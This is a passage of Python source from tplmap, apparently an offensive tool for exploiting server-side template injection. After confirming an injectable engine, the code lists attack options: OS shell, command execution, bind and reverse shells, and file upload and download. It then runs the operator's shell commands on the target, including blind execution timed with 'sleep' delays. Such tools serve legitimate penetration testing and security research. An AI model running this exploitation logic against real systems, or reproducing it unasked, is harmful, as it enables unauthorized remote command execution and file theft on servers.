| 139 | channel.inj_idx += 1 |
| 140 | |
| 141 | def check_template_injection(channel): |
| 142 | |
| 143 | current_plugin = detect_template_injection(channel) |
| 144 | |
| 145 | # Kill execution if no engine have been found |
| 146 | if not channel.data.get('engine'): |
| 147 | log.fatal("""Tested parameters appear to be not injectable. Try to increase '--level' value to perform more tests.""") |
| 148 | return |
| 149 | |
| 150 | # Print injection summary |
| 151 | _print_injection_summary(channel) |
| 152 | |
| 153 | # If actions are not required, prints the advices and exit |
| 154 | if not any( |
| 155 | f for f,v in channel.args.items() if f in ( |
| 156 | 'os_cmd', 'os_shell', 'upload', 'download', 'tpl_shell', 'tpl_code', 'bind_shell', 'reverse_shell' |
| 157 | ) and v |
| 158 | ): |
| 159 | |
| 160 | log.info( |
| 161 | """Rerun tplmap providing one of the following options:\n%(execute)s%(execute_blind)s%(bind_shell)s%(reverse_shell)s%(write)s%(read)s""" % ( |
| 162 | { |
| 163 | 'execute': '\n --os-shell\t\t\t\tRun shell on the target\n --os-cmd\t\t\t\tExecute shell commands' if channel.data.get('execute') and not channel.data.get('execute_blind') else '', |
| 164 | 'execute_blind': '\n --os-shell\t\t\t\tRun shell on the target\n --os-cmd\t\t\tExecute shell commands' if channel.data.get('execute_blind') else '', |
| 165 | 'bind_shell': '\n --bind-shell PORT\t\t\tConnect to a shell bind to a target port' if channel.data.get('bind_shell') else '', |
| 166 | 'reverse_shell': '\n --reverse-shell HOST PORT\tSend a shell back to the attacker\'s port' if channel.data.get('reverse_shell') else '', |
| 167 | 'write': '\n --upload LOCAL REMOTE\tUpload files to the server' if channel.data.get('write') else '', |
| 168 | 'read': '\n --download REMOTE LOCAL\tDownload remote files' if channel.data.get('read') else '', } |
| 169 | ) |
| 170 | ) |
| 171 | |
| 172 | return |
| 173 | |
| 174 | |
| 175 | # Execute operating system commands |
| 176 | if channel.args.get('os_cmd') or channel.args.get('os_shell'): |
| 177 | |
| 178 | # Check the status of command execution capabilities |
| 179 | if channel.data.get('execute_blind'): |
| 180 | log.info("""Blind injection has been found and command execution will not produce any output.""") |
| 181 | log.info("""Delay is introduced appending '&& sleep <delay>' to the shell commands. True or False is returned whether it returns successfully or not.""") |
| 182 | |
| 183 | if channel.args.get('os_cmd'): |
| 184 | print current_plugin.execute_blind(channel.args.get('os_cmd')) |
| 185 | elif channel.args.get('os_shell'): |
| 186 | log.info('Run commands on the operating system.') |
| 187 | Shell(current_plugin.execute_blind, '%s (blind) $ ' % (channel.data.get('os', ''))).cmdloop() |
| 188 | |
| 189 | elif channel.data.get('execute'): |
| 190 | if channel.args.get('os_cmd'): |
| 191 | print current_plugin.execute(channel.args.get('os_cmd')) |
| 192 | elif channel.args.get('os_shell'): |
| 193 | log.info('Run commands on the operating system.') |
| 194 | |
| 195 | Shell(current_plugin.execute, '%s $ ' % (channel.data.get('os', ''))).cmdloop() |
| 196 | |
| 197 | else: |
| 198 | log.error('No system command execution capabilities have been detected on the target.') |